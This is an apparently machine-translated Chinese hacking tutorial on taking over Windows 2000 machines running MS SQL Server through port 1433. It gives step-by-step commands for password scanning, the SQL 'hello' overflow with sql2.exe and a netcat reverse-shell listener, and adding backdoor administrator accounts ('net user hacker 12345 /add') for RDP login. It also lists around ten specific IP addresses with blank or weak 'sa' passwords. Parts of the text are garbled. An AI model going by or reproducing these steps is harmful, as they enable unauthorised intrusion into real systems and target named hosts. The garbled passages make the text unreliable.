端口入侵很難發現,但也有粗心的網管。
Scanport.exe有1433臺機器。
SQLScanPass.exe弄壞了字典(字典是鑰匙)
最後,SQLTools.exe入侵了
對於sql的sp2以下的系統,可以利用sql的hello溢出漏洞進行入侵。
Nc -vv -l -p本地端口sqlhelloF.exe入侵ip 1433本地ip本地端口。
(以上反過來,測試成功)
Sqlhelloz.exe入侵ip 1433(這是壹個正向連接)。
久違的溢出工具
這個站點用X-Scan的服務器掃描結果出來了,開放的端口不少:53,80,1433,3389。但是沒有發現弱密碼的報告,所以似乎網管更有責任。但開放3389端口意味著可以遠程登錄,這是微軟呈現給所有Windows用戶的最大“特洛伊馬”。
通過觀察,我發現只有在端口1433上工作,才有所作為。為什麽不試試SQL2溢出工具?
首先,打開壹個cmd窗口提供netcat,在命令提示符下鍵入“netcat -l -p 99”監聽本地99端口。然後就輪到SQL2了。打開另壹個cmd窗口,鍵入“SQL 2 218.147。*.* 61.157.* * 0”,其中218.147。*.*是對面的IP,665438。我們回過頭來看看監聽本地端口的netcat。變成了C:\WinNT\system32\_,是對方機器的系統文件夾。好像是溢出成功了,就這麽簡單。
我很幸運的從對方那裏得到了壹個外殼,也是管理員允許的。接下來的操作很熟悉。添加用戶,提高權限:在提示處輸入“net user hacker 12345 /add”(在對方機器中創建壹個名為hacker,密碼為12345的用戶),然後輸入“net本地組管理員hacker/add”(將用戶hacker添加到管理員組)。
首先用Windows XP運行遠程登錄設備mstsc.exe,填寫對方IP地址218.147。* *.確認後,用我新創建的用戶名hacker和密碼12345填寫登錄界面,成功進入對方的Windows 2000桌面。
218 . 5 . 135.66 SQL-Server弱密碼:“sa/1234”
218.14.115.11 SQL-server弱密碼:“sa/[空密碼]”
218.12 . 38 . 52 SQL-Server弱密碼:“sa/[空密碼]”
218.12 . 97 . 14 SQL-Server弱密碼:“sa/[空密碼]”
218.6.242.228 SQL-Server弱密碼:“sa/[空密碼]”
222.100.119.3 SQL-Server弱密碼:“sa/[空密碼]”
222.105.67.200 SQL-Server弱密碼:“sa/[空密碼]”
222.105 . 28 . 130 SQL-server弱密碼:“sa/[空密碼]”
222.106 . 60 . 51 SQL-server弱密碼:“sa/[空密碼]”
222.117.107.1 SQL-server弱密碼:“sa/[空密碼]”
如果mssql安裝在win2000機器上,機器將打開端口1433。什麽?什麽是端口?就像食堂買菜的窗口,妳在1窗口買白菜,在2窗口買西紅柿。買機器上的mssql,去端口1433。溢出1433需要兩個工具:nc.exe和sql2.exe。攻擊方法是兩步,在自己的機器上打開壹個cmd窗口。對了,想用win2000,只要開始-運行-鍵入cmd,回車,就餓了。這裏我們只用2000而不是98。如果妳把下壹部next和sql2.exe的作品放在c盤上,只需在打開的窗口中輸入命令C: > NC-1-P 40,然後按回車鍵。這壹步的意思是用nc的工具打開壹個40年的端口監視器。第二步:鍵入cmd dust在開始-運行-並打開壹個新的窗口。在此窗口中編寫命令c:> sql2.exe。妳想入侵網站的ip,輸入自己的ip 40 0。這裏稍微解釋壹下:如何獲取入侵網站的ip?在cmd下,c: > ping網址就可以了。我自己的ip不用說了吧?妳做夢去吧。只需在cmd下輸入ipconfig即可。可以隨意把命令行的40換成別的,不過貌似40和53的成功率更高。如果命令中的0又不確定,可以試試1或者2。如果入侵網站有這個漏洞,那麽妳打開的第壹個窗口就會變成肉雞C: > winnt \ system32 >。也就是說,妳進入了它的機器。進去後可以加個支架。Net用戶guest /active:yes通過這個命令,默認被禁止的guest將被支持並點燃。Net用戶guest 123456,因此guest的密碼變為123456。Net本地組管理員guest/add這是guest成為具有最高權限的管理員的地方。
呵呵,基本就這樣了。。。